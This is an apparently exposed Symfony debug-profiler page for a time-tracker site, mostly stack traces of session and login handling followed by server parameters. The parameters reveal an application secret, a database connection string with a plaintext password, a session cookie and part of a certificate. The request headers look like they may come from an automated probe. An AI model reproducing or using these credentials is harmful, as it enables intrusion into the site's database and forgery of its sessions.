    "line" => 116
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 220
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 139
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 157
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 76
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/Kernel.php"
    "line" => 197
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/autoload_runtime.php"
    "line" => 29
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/public/index.php"
    "line" => 5
    "args" => [
      "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]
Symfony\Component\Security\Csrf\TokenStorage\SessionTokenStorage:52
[
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-csrf/TokenStorage/SessionTokenStorage.php"
    "line" => 52
    "function" => "has"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-csrf/CsrfTokenManager.php"
    "line" => 102
    "function" => "getToken"
    "class" => "Symfony\Component\Security\Csrf\TokenStorage\SessionTokenStorage"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/EventListener/CsrfProtectionListener.php"
    "line" => 50
    "function" => "isTokenValid"
    "class" => "Symfony\Component\Security\Csrf\CsrfTokenManager"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 116
    "function" => "checkPassport"
    "class" => "Symfony\Component\Security\Http\EventListener\CsrfProtectionListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 220
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 139
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 180
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 158
    "function" => "executeAuthenticator"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 140
    "function" => "executeAuthenticators"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
    "line" => 40
    "function" => "authenticateRequest"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
    "line" => 68
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 46
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Firewall/AbstractListener.php"
    "line" => 26
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
    "line" => 60
    "function" => "__invoke"
    "class" => "Symfony\Component\Security\Http\Firewall\AbstractListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 80
    "function" => "__invoke"
    "class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Firewall.php"
    "line" => 95
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 116
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 220
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 139
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 157
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 76
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/Kernel.php"
    "line" => 197
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/autoload_runtime.php"
    "line" => 29
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/public/index.php"
    "line" => 5
    "args" => [
      "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]
Symfony\Component\Security\Csrf\TokenStorage\SessionTokenStorage:56
[
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-csrf/TokenStorage/SessionTokenStorage.php"
    "line" => 56
    "function" => "get"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-csrf/CsrfTokenManager.php"
    "line" => 102
    "function" => "getToken"
    "class" => "Symfony\Component\Security\Csrf\TokenStorage\SessionTokenStorage"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/EventListener/CsrfProtectionListener.php"
    "line" => 50
    "function" => "isTokenValid"
    "class" => "Symfony\Component\Security\Csrf\CsrfTokenManager"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 116
    "function" => "checkPassport"
    "class" => "Symfony\Component\Security\Http\EventListener\CsrfProtectionListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 220
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 139
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 180
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 158
    "function" => "executeAuthenticator"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 140
    "function" => "executeAuthenticators"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
    "line" => 40
    "function" => "authenticateRequest"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
    "line" => 68
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 46
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Firewall/AbstractListener.php"
    "line" => 26
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
    "line" => 60
    "function" => "__invoke"
    "class" => "Symfony\Component\Security\Http\Firewall\AbstractListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 80
    "function" => "__invoke"
    "class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Firewall.php"
    "line" => 95
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 116
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 220
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 139
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 157
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 76
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/Kernel.php"
    "line" => 197
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/autoload_runtime.php"
    "line" => 29
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/public/index.php"
    "line" => 5
    "args" => [
      "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]
Symfony\Component\Security\Http\Authenticator\AbstractLoginFormAuthenticator:51
[
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authenticator/AbstractLoginFormAuthenticator.php"
    "line" => 51
    "function" => "set"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticator.php"
    "line" => 92
    "function" => "onAuthenticationFailure"
    "class" => "Symfony\Component\Security\Http\Authenticator\AbstractLoginFormAuthenticator"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 259
    "function" => "onAuthenticationFailure"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticator"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 212
    "function" => "handleAuthenticationFailure"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 158
    "function" => "executeAuthenticator"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 140
    "function" => "executeAuthenticators"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
    "line" => 40
    "function" => "authenticateRequest"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
    "line" => 68
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 46
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Firewall/AbstractListener.php"
    "line" => 26
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
    "line" => 60
    "function" => "__invoke"
    "class" => "Symfony\Component\Security\Http\Firewall\AbstractListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 80
    "function" => "__invoke"
    "class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Firewall.php"
    "line" => 95
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 116
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 220
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 139
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 157
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 76
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/Kernel.php"
    "line" => 197
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/autoload_runtime.php"
    "line" => 29
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/public/index.php"
    "line" => 5
    "args" => [
      "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]
Symfony\Component\Security\Http\Firewall\ContextListener:171
[
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Firewall/ContextListener.php"
    "line" => 171
    "function" => "remove"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 116
    "function" => "onKernelResponse"
    "class" => "Symfony\Component\Security\Http\Firewall\ContextListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 220
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 139
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 214
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 160
    "function" => "filterResponse"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 76
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/Kernel.php"
    "line" => 197
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/autoload_runtime.php"
    "line" => 29
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/public/index.php"
    "line" => 5
    "args" => [
      "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_ENV
"dev"
APP_SECRET
"6573bd17798d08d4e1541da315ae0eaa"
DATABASE_URL
"mysql://d03b7250:Sm4wEvSWhVLGRYawA8nC@127.0.0.1:3306/d03b7250?serverVersion=8&charset=utf8mb4"

Defined as regular env variables

Key Value
APP_DEBUG
"1"
CONTENT_LENGTH
"860"
CONTENT_TYPE
"multipart/form-data; boundary=--------WebKitFormBoundarya9a7a818565d478e"
CONTEXT_DOCUMENT_ROOT
"/www/htdocs/w0186f22/tt.muex.de/timetracker/public/"
CONTEXT_PREFIX
""
DOCUMENT_ROOT
"/www/htdocs/w0186f22/tt.muex.de/timetracker/public/"
FCGI_ROLE
"RESPONDER"
GATEWAY_INTERFACE
"CGI/1.1"
HOME
"/www/htdocs/w0186f22"
HTTPS
"on"
HTTP_ACCEPT
"*/*"
HTTP_ACCEPT_ENCODING
"gzip, deflate"
HTTP_CONNECTION
"keep-alive"
HTTP_COOKIE
"PHPSESSID=52d863b55ef82d06d55d823542b202f6; sf_redirect=%7B%22token%22%3A%22d4a7b4%22%2C%22route%22%3A%22app_login%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CSecurityController%22%2C%22method%22%3A%22login%22%2C%22file%22%3A%22%5C%2Fwww%5C%2Fhtdocs%5C%2Fw0186f22%5C%2Ftt.muex.de%5C%2Ftimetracker%5C%2Fsrc%5C%2FController%5C%2FSecurityController.php%22%2C%22line%22%3A13%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D"
HTTP_HOST
"tt.muex.de"
HTTP_NEXT_ACTION
"x"
HTTP_USER_AGENT
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
HTTP_X_LE_CLIENT_IP
"3.79.7.137"
HTTP_X_LE_CLIENT_UA
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
HTTP_X_NEXTJS_REQUEST_ID
"67093fcf"
PATH
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
PHP_SELF
"/index.php"
QUERY_STRING
""
REDIRECT_HTTPS
"on"
REDIRECT_SSL_CLIENT_CERT
""
REDIRECT_SSL_SERVER_CERT
"""
-----BEGIN CERTIFICATE-----\n
MIIE/zCCA+egAwIBAgISBnpGHUxL26XlMI3yEzFbLFGDMA0GCSqGSIb3DQEBCwUA\n
MDMxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQwwCgYDVQQD\n
EwNSMTIwHhcNMjYwMzI4MTgwNTE5WhcNMjYwNjI2MTgwNTE4WjAVMRMwEQYDVQQD\n
Ewp0dC5tdWV4LmRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqmVl\n
xG9v1lhBQbuXDMdudS3Dyu2abUNwEh0p8H6SM0oBJuu/I85Ltn0ydCQUNDHyOZsJ\n
+Ec7eQPK5nyv1nkMjAbk33OUXwO/npNjueqrLwTFN1NRrnjVshva9HThS+PVGZyd\n
4G0QjxU3oA4nlIn+sd7UoTmjN1k2v7fksW+TpjmMGuGQ7PPgFIBDow+K0h23PqAU\n
bRxrxpfwdcsk7B+NWnl7oqQ75hhPSnbfWsZVqzN2Gavo/BM5GEPUZxsUZH1vOnwb\n
t0Uhte0gYuMZl4JknKYQw7wTajOxw8LGr5XMisMxbSbQrjyy+FLVQ4xs/vP/IgpA\n
